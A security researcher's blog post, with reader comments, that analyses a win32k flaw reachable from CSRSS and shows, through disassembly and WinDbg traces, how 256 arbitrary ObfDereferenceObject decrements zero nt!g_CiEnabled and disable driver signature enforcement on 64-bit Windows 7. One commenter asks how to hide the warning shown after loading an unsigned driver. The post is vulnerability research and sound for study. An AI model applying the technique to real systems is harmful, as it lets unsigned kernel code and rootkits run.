Defeating Windows Driver Signature Enforcement #2: CSRSS and thread desktops

To stand by my claim that the Microsoft Windows operating system has been built on the fundamental assumption that administrative privileges would always be equivalent to the ability to run arbitrary ring-0 code, I have decided to briefly discuss yet another portion of Windows internals. It can be easily misused by a system administrator to unlawfully cross the admin / kernel boundary on an x86-64 platform, and effectively elevate his rights on the machine by loading an unsigned device driver of his choice. The technique is directly related to CSRSS (the infamous Client/Server Runtime Subsystem), a part of Windows that has likely motivated most of the dirty relic hacks in the kernel that still remain visible in the most recent versions of the OS.

As usual, let’s start with some historical context. Back in July 2007, omega_red started a thread on the woodmann RCE forums, stating that he had found a GDI bug (a Blue Screen of Death triggerable from user-mode) that required “pretty unusual conditions” to work. A few days into the discussion, Alex Ionescu chimed in and said that, inspired by omega’s finding, he had spent a night looking around the win32k.sys module and located four vulnerabilities that he would be willing to present at the BlackHat conference; and so he did – the slides from his BlackHat USA 2008 talk titled “Pointers and Handles” can be found here. All issues discussed by Alex are fairly interesting, so be sure to check out the slides if you haven’t already; the important one for us is the NULL Pointer Dereference within CSRSS.EXE via xxxCreateThreadInfo. The kernel routine would dereference an internal CurrentW32Thread->Desktop pointer without prior sanitization, thus using a pointer that was never initialized for the special subsystem process in the first place. In fact, there might be a few more instances of such bugs in the kernel nowadays, but stay tuned… :-)

During his talk, Alex also mentioned a list of CSRSS-reserved system calls within the main graphical device driver, most of which are still found in Windows 7 and 8 today. These services usually begin with the following expression:

if (PsGetCurrentProcess() != gpepCsrss) {
  return STATUS_ACCESS_DENIED;
}

If we take a look at the list of cross-references to the global gpepCsrss symbol in the context of a cmp operation, we will get a comprehensive list of functions that are either entirely reserved for system use, or provide some such functionality (the list below was acquired from Windows 8 32-bit):

_BlockInput
CheckProcessIdentity
_CloseDesktop
_CreateEmptyCursorObject
DestroyProcessesObjects
_GetProcessDefaultLayout
GetThreadsWithPKL
HandleSystemThreadCreationFailure
InitializeClientPfnArrays
IsHandleEntryAccessibleForIL
_LoadCursorsAndIcons
NtUserAutoRotateScreen
NtUserCheckAccessForIntegrityLevel
NtUserCtxDisplayIOCtl
NtUserDestroyCursor
NtUserGetCaretBlinkTime
NtUserGetDoubleClickTime
NtUserHardErrorControl
NtUserNotifyProcessCreate
NtUserPostMessage
NtUserPostThreadMessage
NtUserProcessConnect
NtUserQueryInformationThread
NtUserRemoteConnect
NtUserRemoteRedrawRectangle
NtUserRemoteRedrawScreen
NtUserRemoteStopScreenUpdates
NtUserSetInformationThread
NtUserSetSensorPresence
NtUserSetThreadDesktop
OpenCacheKeyEx
PDEVOBJ::FontManagement
PDEVOBJ::GetTrueTypeFile
_PostMessageCheckIL
_PostMessageExtended
_PostThreadMessage
PowerOnGdi
RecalculateQueueInfo
_RegisterHotKey
RemoteLogoff
RemotePassthruDisable
RemoteShadowCleanup
RemoteShadowStart
RemoteThinwireStats
_SetCursorIconData
_ShouldFrostCrashedWindow
_ShouldFrostSiblingWindow
_ShouldGhostWindow
UnmapDesktop
UserGetDesktopDC
ValidateHwndEx
vCleanupUMWindowlessSprite
VideoPortCalloutThread
WakeRITForShutdown
xxxCreateSystemThreads
xxxCreateThreadInfo
xxxDesktopRecalc
xxxGetDeviceChangeInfo
xxxInitTerminal
xxxInternalKeyEventDirect
xxxInternalUserChangeDisplaySettings
xxxInterSendMsgEx
xxxMouseEventDirect
xxxRealDefWindowProc
xxxRemoteConsoleShadowStop
xxxRemoteDisconnect
xxxRemoteNotify
xxxRemotePassthruEnable
xxxRemoteReconnect
xxxRemoteShadowSetup
xxxRemoteShadowStop
xxxSetDeskWallpaper
xxxSetProcessInitState
xxxSetThreadDesktop
xxxSystemParametersInfo
xxxWrapRealDefWindowProc
zzzClipCursor
zzzResetSharedDesktops

Please note that while CSRSS is a system-critical process, an administrator can easily execute code within it – after enabling SeDebugPrivilege in his token, one can use pretty much all process-manipulation API functions (such as WriteProcessMemory or CreateRemoteThread) on the process. Now, the big question is – to what extent do these routines trust CSRSS to provide sensible (and safe) input data? If we look at the past, they seem to have been rather reckless and didn’t perform any sanity checking at all, as described by Alex from ntinternals.org in the “Windows XP SP2/SP3 (NtUserConsoleControl) – Local Privilege Escalation” article available here. Even though these issues are long gone now that Microsoft has developed adequate fixes (mostly consisting of calling ProbeForRead and ProbeForWrite in the right places), the kernel never really stopped indirectly trusting the subsystem process in numerous other places. For example, let’s take a look at snippets of the win32k!NtUserSetInformationThread function implementation:

.text:BF93ED97 call ds:__imp__PsGetCurrentProcess@0 ; PsGetCurrentProcess()
.text:BF93ED9D cmp eax, _gpepCSRSS
.text:BF93EDA3 jnz loc_BFA7E296

First of all, it obviously verifies that the caller is indeed a CSRSS process.

.text:BF93EDA9                 mov     esi, [ebp+length]
.text:BF93EDAC                 cmp     esi, 0Ch
.text:BF93EDAF                 ja      loc_BFA7E2AA
.text:BF93EDB5                 test    esi, esi
.text:BF93EDB7                 jz      loc_BF93EE4D
.text:BF93EDBD                 and     [ebp+ms_exc.disabled], 0
.text:BF93EDC1                 mov     ebx, [ebp+Address]
.text:BF93EDC4                 test    bl, 3
.text:BF93EDC7                 jnz     short loc_BF93EE39
.text:BF93EDC9                 lea     ecx, [ebx+esi]
.text:BF93EDCC                 mov     eax, _W32UserProbeAddress
.text:BF93EDD1                 cmp     ecx, eax
.text:BF93EDD3                 ja      short loc_BF93EE3F
.text:BF93EDD5                 cmp     ecx, ebx
.text:BF93EDD7                 jb      short loc_BF93EE3F
.text:BF93EDD9
.text:BF93EDD9 loc_BF93EDD9:                           ; CODE XREF: NtUserSetInformationThread(x,x,x,x)+EA
.text:BF93EDD9                 push    esi             ; size_t
.text:BF93EDDA                 push    ebx             ; void *
.text:BF93EDDB                 lea     eax, [ebp+local_buffer]
.text:BF93EDDE                 push    eax             ; void *
.text:BF93EDDF                 call    _memcpy
.text:BF93EDE4                 mov     [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:BF93EDEB                 add     esp, 0Ch

Further on, the input data length is enforced to be less than or equal to 0Ch (12), after which the data itself is copied into a stack-based buffer located at ebp+local_buffer (originally ebp+var_24). This is not the subject of the post, but please note that there is a bug here already – the routine only checks that the length is not greater than the size of the input structure, but later assumes that it is equal to that size. Therefore, if we pass anything smaller than 12 as the data length (say zero), parts of the buffer will remain uninitialized and will later be read from – the behavior may consequently lead to a certain degree of information disclosure… Anyway, let’s dig further into the function:

.text:BF93EDEE                 push    esi             ; input data length
.text:BF93EDEF                 lea     eax, [ebp+local_buffer]
.text:BF93EDF2                 push    eax             ; stack-based input buffer of size 12
.text:BF93EDF3                 push    [ebp+cmd_code]  ; fully controlled control code
.text:BF93EDF6                 push    [ebp+handle]    ; input handle
.text:BF93EDF9                 call    _xxxSetInformationThread@16 ; xxxSetInformationThread(x,x,x,x)

There’s a call to an internal win32k!xxxSetInformationThread function with controlled parameters and a pointer to a controlled structure. Let’s look inside.

.text:BF93EE6E                 lea     ecx, [ebp+Object]
.text:BF93EE71                 push    ecx             ; Object
.text:BF93EE72                 push    1               ; AccessMode
.text:BF93EE74                 push    dword ptr [eax] ; ObjectType
.text:BF93EE76                 push    20h             ; DesiredAccess
.text:BF93EE78                 push    [ebp+handle]    ; Handle
.text:BF93EE7B                 call    ds:__imp__ObReferenceObjectByHandle@24 ; ObReferenceObjectByHandle(x,x,x,x,x,x)
[...]
.text:BF93EE8B                 mov     ebx, [ebp+buffer]
[...]
.text:BF93EE8F                 mov     edi, [ebp+cmd_code]
[...]
.text:BF93EE9C                 cmp edi, 9
.text:BF93EE9F                 jz short loc_BF93EED6
[...]
.text:BF93EED6 loc_BF93EED6: ; CODE XREF: xxxSetInformationThread(x,x,x,x)+3F
.text:BF93EED6                 add ebx, 4
.text:BF93EED9                 call _xxxRestoreCsrssThreadDesktop@4 ; xxxRestoreCsrssThreadDesktop(x)

What happens here is that the handle parameter from the original syscall is referenced as a thread object, and later, if the control code is equal to nine, another internal function called win32k!xxxRestoreCsrssThreadDesktop is invoked with the (buffer+4) address passed as a parameter inside ebx, and the return value of the preceding ObReferenceObjectByHandle (NTSTATUS) as a parameter in register esi. By following the call chain, we can observe the following code:

.text:BF93EFEF ; __stdcall xxxRestoreCsrssThreadDesktop(x)
[...]
.text:BF93F02C loc_BF93F02C:                           ; CODE XREF: xxxRestoreCsrssThreadDesktop(x)+68
.text:BF93F02C                 mov     ecx, [ebx]
.text:BF93F02E                 test    ecx, ecx
.text:BF93F030                 jnz     short loc_BF93F059
.text:BF93F032
.text:BF93F032 loc_BF93F032:                           ; CODE XREF: xxxRestoreCsrssThreadDesktop(x)+72
.text:BF93F032                 mov     esi, [ebx+4]
.text:BF93F035                 test    esi, esi
.text:BF93F037                 jz      short loc_BF93F042
.text:BF93F039                 push    edi
.text:BF93F03A                 call    _CloseProtectedHandle@8 ; CloseProtectedHandle(x,x)
.text:BF93F03F                 mov     [ebx+4], edi
.text:BF93F042
.text:BF93F042 loc_BF93F042:                           ; CODE XREF: xxxRestoreCsrssThreadDesktop(x)+48
.text:BF93F042                 mov     eax, [ebp+var_4]
.text:BF93F045                 pop     edi
.text:BF93F046                 pop     esi
.text:BF93F047                 leave
.text:BF93F048                 retn
[...]
.text:BF93F059                 call    ds:__imp_@ObfDereferenceObject@4 ; ObfDereferenceObject(x)
.text:BF93F05F                 mov     [ebx], edi
.text:BF93F061                 jmp     short loc_BF93F032

The above assembly translates to the following:

/* 
 * ... irrelevant ...
 */

if (buffer->object) {
  ObfDereferenceObject(buffer->object);
}
if (buffer->handle) {
  CloseProtectedHandle(buffer->handle);
}

Keeping in mind that buffer is still pointing at a user-controlled structure, it becomes clear that the current implementation enables CSRSS to operate on raw kernel-mode addresses and handles; furthermore, if controlled by a rogue user, it makes it possible to either corrupt kernel-mode memory by passing an arbitrary non-object parameter to ObfDereferenceObject, or potentially cause a use-after-free condition by illegally closing a system handle or passing in a pointer to an object that is not intended to be dereferenced at this point. One simple way to exploit the issue is described below.

The nature of the memory operations performed by the ObfDereferenceObject routine upon an object is fairly straightforward:

.text:0045447C                 lea     esi, [ebx-18h]  ; ebx = object
[...]
.text:00454499                 or      edi, 0FFFFFFFFh
.text:0045449C                 lock xadd [esi], edi

Just one thing to keep in mind is that the signed value being decremented by one is not supposed to drop below one; otherwise, the object manager would attempt to free the “object” from the kernel pools, which would either render exploitation completely impossible or complicate it considerably. If we take a step back and look at the “A quick insight into the Driver Signature Enforcement” article from two years ago (which was probably around the time I stumbled upon the issue discussed here), we can see that disabling the mechanism on a live system session can be as simple as flipping the nt!g_CiEnabled byte from one to zero. Let’s take a look at our chances inside a Windows 7 64-bit session investigated with WinDbg:

kd> dq nt!g_cienabled-8
fffff800`02e45eb0  fffff880`00cdc470 00000000`00000001
fffff800`02e45ec0  00000000`00000000 00000000`00000000
fffff800`02e45ed0  00000000`00000000 00000000`00000000
[...]

As we can see, there is a 64-bit pointer directly before the value of interest, and just zeros after it. Bearing in mind that we can’t just decrement a 64-bit value to zero or less explicitly, we need to do some non-aligned memory access. If we take a look at the memory address shifted by one, here’s what we get:

kd> dq nt!g_cienabled-1
fffff800`02e45eb7  00000000`000001ff 00000000`00000000

Our target byte becomes the second-least significant byte of the qword, with the least significant one always being 0xff (due to canonical address space addressing: it is the top byte of the preceding kernel pointer). Therefore, we can perform exactly 256 decrements (0x1ff - 0x100 = 0xff) using the ObfDereferenceObject call with an arbitrary parameter in order to drop the nt!g_CiEnabled byte to zero and keep the preceding pointer untouched and valid. This is how it looks in practice:

kd> !process
PROCESS fffffa80020c5b30
    SessionId: 1  Cid: 017c    Peb: 7fffffd9000  ParentCid: 0174
    DirBase: 19e1b000  ObjectTable: fffff8a005fc18e0  HandleCount: 204.
    Image: csrss.exe
[...]
kd> u
nt!ObfDereferenceObject+0x2c:
fffff800`02ca946c f0480fc11f      lock xadd qword ptr [rdi],rbx

kd> ? rbx; dq rdi
Evaluate expression: -1 = ffffffff`ffffffff
fffff800`02e45eb7  00000000`000001ff 00000000`00000000
[...]
kd> dq rdi
fffff800`02e45eb7  00000000`000001f8 00000000`00000000
[...]
kd> dq rdi
fffff800`02e45eb7  00000000`0000012f 00000000`00000000
[...]
kd> dq rdi
fffff800`02e45eb7  00000000`000000ff 00000000`00000000

kd> db nt!g_CiEnabled
fffff800`02e45eb8  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

Aaaaaand… that’s it ;-) Although not very spectacular, you can also watch a demo exploitation video below. I believe I privately reported the bug to Microsoft somewhere around 2009, but it was obviously not classified as a security issue (just a reliability one), and apparently hasn’t been found important enough to be fixed up until now. I hope you guys enjoyed the post, more Windows internals to come soon!

14 thoughts on “Defeating Windows Driver Signature Enforcement #2: CSRSS and thread desktops”

  1. Yeah I enjoyed this post.

    Although this is a mostly uninteresting kind of exploit, I feel that Windows contains tons of place where one could elevate from standard user to system using similar techniques.

    When I scanned the leaked W2k kernel sources I really noticed a lot of unvalidated user-mode arguments and mutation of shared, unsynchronized state. I think it is (or was) a mess.

  2. The nature of memory operations performed by the ObfDereferenceRoutine routine upon an object is fairly straight-forward:

    1. .text:0045447C lea esi, [ebx-18h] ; ebx = object
    2. […]
    3. .text:00454499 or edi, 0FFFFFFFFh
    4. .text:0045449C lock xadd [esi], edi

    Mabey i am utherly rusted but it takes alot of imagination to go from prinout 1 to 4 and assume
    that the function automatically decrement the value by “256” as stated.

    As your trace shown.

    1ff
    1f8 delta: 7
    12f delta: 201
    0ff delta: 48
    000 delta: 255

    Obviously there might be other arcane left to the readers to find
    but if thats the case why don’t you wait for disclosure to actually publish.

  3. when load driver,the Program Compatibility Assistant dialog show,but the driver has loaded success. So why the PCA dialog show and how to fuck this?

  4. @tobi: erm… I don’t think scanning through W2k kernel sources is by any means legal unless you’re a Microsoft employee. Anyway, it’s true that win32k.sys is intensely messy and there’s a lot of fishy action going on there. Perhaps it’s the largest source of local and remote vulnerabilities in the Windows kernel ever. Looking forward to your reporting some of them ;)

    @omeg: hehe ;-)

    @marsh mellow: maybe it’s high time to get some imagination? None of the other readers complained.

    @hello: not sure if I understand correctly, but I assume that you’re referring to the ability to load unsigned drivers while the system is in debug mode (i.e. with windbg attached remotely). Have you tried loading a driver with remote debugging disabled?

  5. “None of the other readers complained” … well im not complaining im just highlighting the fastforward assumption without details.

    I understand you might not want people to recreate it right off the shelf, but if i read something that disclose and issue why not detail it correctly.

    And last time i tried to compile imagination, i couldn’t, lack of memory.

  6. @marsh mellow: really, I think it’s pretty clear what the listing shows (four breaks in random intervals during the process of decrementing the value by one 256 times) based on the context, and let’s stop there.

  7. I mean when I exploit success(aka. nt!g_cienabled has been set to 0), then when I load a unsigned driver, the “Program Compatibility Assistant” dialog appear and says “Windows requires a digitally signed driver…”, of course the driver loaded successfully. but I don’t want the PCA dialog show.

  8. “Perhaps it’s the largest source of local and remote vulnerabilities in the Windows kernel ever.”
    The funny thing is when NT 4.0 was released back in 1996, WinFrame already existed based on NT 3.51 with *per-session* CSRSS, but NT4 TSE was not released until 1998.
